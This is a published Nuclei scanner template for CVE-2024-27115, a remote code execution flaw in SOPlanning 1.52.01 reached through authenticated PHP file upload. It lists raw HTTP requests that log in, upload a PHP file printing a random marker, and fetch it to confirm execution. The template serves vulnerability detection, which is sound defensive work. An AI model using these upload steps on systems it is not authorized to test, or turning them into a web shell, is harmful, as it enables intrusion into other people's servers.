Skip to content
Nuclei Templates

SOPlanning - Remote Code Execution

ID: CVE-2024-27115

Severity: high

Author: [email protected]

Tags: cve,cve2024,soplanning,rce,authenticated,file-upload,intrusive

Description

Section titled “Description”

Detects a remote code execution vulnerability in SOPlanning version 1.52.01 through authenticated PHP file upload.

YAML Source

Section titled “YAML Source”
id: CVE-2024-27115


info:
  name: SOPlanning - Remote Code Execution
  author: [email protected]
  severity: high
  description: |
    Detects a remote code execution vulnerability in SOPlanning version 1.52.01 through authenticated PHP file upload.
  reference: |
    - https://www.exploit-db.com/exploits/52082
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27115
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/S:N/AU:Y/R:I/V:C/RE:M/U:Red
    cvss-score: 10.0
    cve-id: CVE-2024-27115
    cwe-id: CWE-434
    epss-score: 0.00091
    epss-percentile: 0.40630
    cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
  tags: cve,cve2024,soplanning,rce,authenticated,file-upload,intrusive


variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{rand_base(5)}}"


http:
  - raw:
      - |
        POST /process/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        login={{username}}&password={{password}}


      - |
        POST /process/upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=0ccdfeede39eb97743b39d87536933e1


        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="linkid"


        soonghee
        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="periodeid"


        0
        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="fichiers"


        {{randstr}}.php
        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="type"


        upload
        --0ccdfeede39eb97743b39d87536933e1
        Content-Disposition: form-data; name="fichier-0"; filename="{{filename}}.php"
        Content-Type: application/x-php


        <?php echo '{{randstr}}'; ?>
        --0ccdfeede39eb97743b39d87536933e1--


      - |
        GET /upload/files/soonghee/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '{{randstr}}'


      - type: word
        part: header
        words:
          - 'text/html'


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cb33fa6d1d4d21c860963c6dd99894b630bbfac3f6750c3605ab799e244c130b022100d6b4501c0c2a8cf47e938fe78b65f6c88d857edfa3bff7cdc8615a6019864991:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-27115.yaml"

View on Github